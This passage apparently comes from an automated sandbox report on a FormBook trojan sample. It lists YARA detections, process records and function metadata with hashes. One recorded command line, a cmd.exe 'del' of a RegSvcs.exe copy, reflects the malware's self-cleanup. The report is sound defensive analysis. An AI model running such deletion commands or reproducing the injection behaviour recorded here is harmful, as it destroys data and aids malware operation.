Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	15:16:19
Start date:	14/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:16:20
Start date:	14/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	97.9%
Signature Coverage:	0%
Total number of Nodes:	144
Total number of Limit Nodes:	9

Executed Functions

Function 0084E758 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0084E7D6
GetCurrentThread.KERNEL32 ref: 0084E813
GetCurrentProcess.KERNEL32 ref: 0084E850
GetCurrentThreadId.KERNEL32 ref: 0084E8A9

Memory Dump Source

Source File: 00000000.00000002.1678571290.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_z2______________________________.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 15fa406f082f0f4aa5de563a22c70d8d1a09d418a98948bea71eac89729b4b69
Instruction ID: 9401e04bda88be3bac90e8a97d6b1b9fc25d43321ba83f311c743b454526b169
Opcode Fuzzy Hash: 15fa406f082f0f4aa5de563a22c70d8d1a09d418a98948bea71eac89729b4b69
Instruction Fuzzy Hash: EA5104B09002498FDB14DFA9D548B9EFBF1FB88318F208469E459A7260DB749984CB69

Uniqueness

Uniqueness Score: -1.00%

Function 04C43304 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C43422

Memory Dump Source

Source File: 00000000.00000002.1683764692.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c40000_z2______________________________.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f8bb7d3bcbc66c0a3e6fa36de9e3ac79c71adaf819864133725cb272f31d4242
Instruction ID: d1add9b8b9b54967d743375cb798bab50b41b736b3e2dcd2800e32ec22d2f682
Opcode Fuzzy Hash: f8bb7d3bcbc66c0a3e6fa36de9e3ac79c71adaf819864133725cb272f31d4242
Instruction Fuzzy Hash: 4D51C4B1D00349DFDB15CF99C584ADDBFB6BF88314F24812AE819AB220D775A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04C43310 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C43422

Memory Dump Source

Source File: 00000000.00000002.1683764692.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c40000_z2______________________________.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3cb6cf5b9edc09c98af150bbcf113847178a3aa95f435b0767f5ced90165d1c9
Instruction ID: cd6a20d8ea3e439cd1becb682f5d6a3539a31753615d4fc0757b2e3f0f4efad2
Opcode Fuzzy Hash: 3cb6cf5b9edc09c98af150bbcf113847178a3aa95f435b0767f5ced90165d1c9
Instruction Fuzzy Hash: E041B5B1D003499FDB15CF99C984ADDBFB6BF88314F24812AE819AB210D775A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0084590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 008459C9

Memory Dump Source

Source File: 00000000.00000002.1678571290.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_z2______________________________.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d3e9ea35368a4c8558d840272aee7c3d8f53270889c5400a35fb46c56a2beada
Instruction ID: acbfbea1c3710b76f626010b100b2a755de76da2b676cde516ab66daaf0f91ae
Opcode Fuzzy Hash: d3e9ea35368a4c8558d840272aee7c3d8f53270889c5400a35fb46c56a2beada
Instruction Fuzzy Hash: AC41CFB0C0061DCFDB24CFA9C884BDEBBB6BF49704F24815AD408AB255DB755946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04C417D4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04C459A1

Memory Dump Source

Source File: 00000000.00000002.1683764692.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c40000_z2______________________________.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a3cbc9500f9902c7a59c4d9ac2754e2ab9ed090e72bb6b917999ec6c624def23
Instruction ID: 3899ade66912717356a6a2d96d76a0110adb0d6fb9a1f96e924d04a91721f725
Opcode Fuzzy Hash: a3cbc9500f9902c7a59c4d9ac2754e2ab9ed090e72bb6b917999ec6c624def23
Instruction Fuzzy Hash: 31415AB8A00305DFCB04CF99C548AAAFBF6FB98324F24C459D559AB321D770A841CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 008444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 008459C9

Memory Dump Source

Source File: 00000000.00000002.1678571290.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_z2______________________________.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ed460de475ad0658be4e182db1d6be06d4791b62cbd09b040999b6c8d97a686c
Instruction ID: dc509b474472ba17dfb462c8d6b9c4314449e41c82c674138fdb23f8e8a1f98c
Opcode Fuzzy Hash: ed460de475ad0658be4e182db1d6be06d4791b62cbd09b040999b6c8d97a686c
Instruction Fuzzy Hash: 7041CFB0C0061DCBDB24DFA9C884BDEBBB5FF49704F24816AD408AB255DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0084E9A0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084EA27

Memory Dump Source

Source File: 00000000.00000002.1678571290.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_z2______________________________.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: deb83041bae7c069149b47493c628633c9897c82e6f6d38476436cce17cabbbc
Instruction ID: 6c02592d4fcae72d9c817d5eac08331bde8f0cb9d39a64d2436184ad2a360c75
Opcode Fuzzy Hash: deb83041bae7c069149b47493c628633c9897c82e6f6d38476436cce17cabbbc
Instruction Fuzzy Hash: 4721C2B5900258DFDB10CFAAD984ADEBFF9FB48320F14841AE958A7350D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0084BF30 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0084C7A1,00000800,00000000,00000000), ref: 0084C9B2

Memory Dump Source

Source File: 00000000.00000002.1678571290.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_z2______________________________.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d284878612c5633027bf4623bf29e5ddaa28b70f32baf6aefbccc11fd7b14a5a
Instruction ID: 9bb21cd821f78e44b096094788950a415553beaa4cc79869e8a514942280e6a3
Opcode Fuzzy Hash: d284878612c5633027bf4623bf29e5ddaa28b70f32baf6aefbccc11fd7b14a5a
Instruction Fuzzy Hash: 5A1114B69002089FDB10DF9AC444ADEFFF8FB48314F10842AE559A7210C375A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0084C6C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0084C726

Memory Dump Source

Source File: 00000000.00000002.1678571290.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_z2______________________________.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e0911e67186d673c9a0bf4367cf863b743724f131b8f8c6b0692768ea048f34b
Instruction ID: 36555bebee366b37bd8888f753c6aeeb9fb07ed3a3976a36d4fd80eca5accf5d
Opcode Fuzzy Hash: e0911e67186d673c9a0bf4367cf863b743724f131b8f8c6b0692768ea048f34b
Instruction Fuzzy Hash: FA1110B6C002498FCB10DF9AC444ADEFBF8EB88324F10852AD458B7210C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0078D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678166223.000000000078D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d000_z2______________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af014b2068a3491357850aa74cf6cd38a7da599a2c5bb538d8159222981b7761
Instruction ID: 83964b54f31da4cb87aa8d0e1830e02f816d7d4f640e1143015f6ffa49c431e6
Opcode Fuzzy Hash: af014b2068a3491357850aa74cf6cd38a7da599a2c5bb538d8159222981b7761
Instruction Fuzzy Hash: 7921F271684204DFDB24EF14D9C4B26BBA5EB88314F20C569D84A4B296C33ADC47CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0078D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678166223.000000000078D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d000_z2______________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: f307c44300f1e533a0982479ffb1c528ddb0a1f83f39f15752a1bf3eeef96434
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: F311DD75544284CFDB21DF14D5C4B16FFA2FB88314F24C6AAD8494B696C33AD80ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04C41A70 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683764692.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c40000_z2______________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be40e740f2ecb8b6f8015fbfd0e39eaeeedd63551993cc6dfc174938443f399
Instruction ID: e12512c8c3905d2dcc04a2ab5bf612eaeb1168773a9fe3404cdd73f1a38dfd73
Opcode Fuzzy Hash: 8be40e740f2ecb8b6f8015fbfd0e39eaeeedd63551993cc6dfc174938443f399
Instruction Fuzzy Hash: E41251B0801B458AE731CF65ED4CA893AB1FB85318F504629D2696B2F5DFF815CACF44

Uniqueness

Uniqueness Score: -1.00%

Function 04C40CA8 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683764692.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c40000_z2______________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e01b45185336680f7eae75ffaa0a5c3bbe7a00a47b08ca827df3dc63f6608a5
Instruction ID: adead0119f686c8b911b619fa537e6729f841818ea6844ee15ec0bf1d7192e1d
Opcode Fuzzy Hash: 4e01b45185336680f7eae75ffaa0a5c3bbe7a00a47b08ca827df3dc63f6608a5
Instruction Fuzzy Hash: 73A15B32E002198FCF15DFB5D94059EB7B3FF84300B15857AEA06AB266DB71EA55CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04C41A62 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683764692.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c40000_z2______________________________.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f33a940a96e524c112c76e19db69d6cc5715b20145bcf9d317076a78600e3b
Instruction ID: 765a0087239863a057e662b834654ffbb359ad6218e6c203c5440ddedb010f36
Opcode Fuzzy Hash: 78f33a940a96e524c112c76e19db69d6cc5715b20145bcf9d317076a78600e3b
Instruction Fuzzy Hash: D2C1D1B0801B468AE731CF69ED48A897BB1FB85324F504629D1696B2F4EFF415CACF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 7708, Parent PID: 7496COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.8%
Total number of Nodes:	551
Total number of Limit Nodes:	64

Executed Functions

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

!JA, xrefs: 0041A41C, 0041A428
bMA, xrefs: 0041A43D, 0041A444
bMA, xrefs: 0041A422, 0041A430

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A52C Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
Instruction ID: 11312a3560ed96ce417ed1ca4fb8cb34436df2ac178403c73e4b79343ce43b1b
Opcode Fuzzy Hash: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
Instruction Fuzzy Hash: A8F0F2B2200208ABCB14DF89CC91EAB77A9AF88754F158149BA1897241C634E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A47C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
Instruction ID: 0494ff60b09d4fc21657d6c615b5019aa557bb466eed1ab501d89975e332403b
Opcode Fuzzy Hash: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
Instruction Fuzzy Hash: 84E01776600214ABD720EBD9CC85FE77B68EF48764F158499BA1CAB242C534FA118BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

Uniqueness

Uniqueness Score: -1.00%

Function 019D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2BFA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ca0376d900bc6bf38960e8642eaf59f454d7e2dfe854bcf7aa95c1b39649332
Instruction ID: 32b2fe160a3b498e4d898c53ea66ce1c8b714ecee79d2f58b2611aeed7fa1ce6
Opcode Fuzzy Hash: 6ca0376d900bc6bf38960e8642eaf59f454d7e2dfe854bcf7aa95c1b39649332
Instruction Fuzzy Hash: 9C90023120150802D1817198840C64A408997D1301F95C015A0065654DCA158B5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 019D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2B6A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b12b600f1ba45f854122ca352c594e35593622359ee8b856299baa32c7ce71df
Instruction ID: 08a9e136339b85f1c123cc31f18bf9ad5eabc24c94241471f26b8518dd5ec805
Opcode Fuzzy Hash: b12b600f1ba45f854122ca352c594e35593622359ee8b856299baa32c7ce71df
Instruction Fuzzy Hash: 8F9002612025000341067198841C616808E97E0201B55C021E1054590DC52589916225

Uniqueness

Uniqueness Score: -1.00%

Function 019D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2ADA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5559baacef6c8051ab018d12c11ed427c5dd8d2c6165e206085772f9f94c0215
Instruction ID: 00d808ef9cf542a90c965ba72d1a01dea7f1758c19e852734511b0013af3d70c
Opcode Fuzzy Hash: 5559baacef6c8051ab018d12c11ed427c5dd8d2c6165e206085772f9f94c0215
Instruction Fuzzy Hash: FF900435311500030107F5DC470C50740CFD7D5351355C031F1055550CD731CD715331

Uniqueness

Uniqueness Score: -1.00%

Function 019D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2DDA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8472dd168aea356fd8369b2012d36c1edfda392ba5fb044c92f3a36e2cd24b88
Instruction ID: 609baa65c8fefc90a785614ef17a3bbf66cf8737badccee0e0918a7187fca535
Opcode Fuzzy Hash: 8472dd168aea356fd8369b2012d36c1edfda392ba5fb044c92f3a36e2cd24b88
Instruction Fuzzy Hash: 28900221242541525546B198840C507808AA7E0241795C012A1454950CC5269956D721

Uniqueness

Uniqueness Score: -1.00%

Function 019D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2DFA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bab90bee4bed9b3b7681cb5198b5fb1b27eaad7a80b9e11435d76a2cbc06a822
Instruction ID: 628203df34e2e41b64aba01d02c5aa4182b3984556fecab69074ea68483a72c2
Opcode Fuzzy Hash: bab90bee4bed9b3b7681cb5198b5fb1b27eaad7a80b9e11435d76a2cbc06a822
Instruction Fuzzy Hash: 0590023120150413D1127198850C707408D97D0241F95C412A0464558DD6568A52A221

Uniqueness

Uniqueness Score: -1.00%

Function 019D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2D1A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e5ac37afa0012b3ff4adc2ae3c89f3bc156f09de64536a394e16619e06e1f49
Instruction ID: dc9f143a76433baadcbe804e29f8745ee2532b94a80f6a50455b93fc6399a0ec
Opcode Fuzzy Hash: 0e5ac37afa0012b3ff4adc2ae3c89f3bc156f09de64536a394e16619e06e1f49
Instruction Fuzzy Hash: 7390022921350002D1817198940C60A408997D1202F95D415A0055558CC91589695321

Uniqueness

Uniqueness Score: -1.00%

Function 019D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2D3A

Memory Dump Source

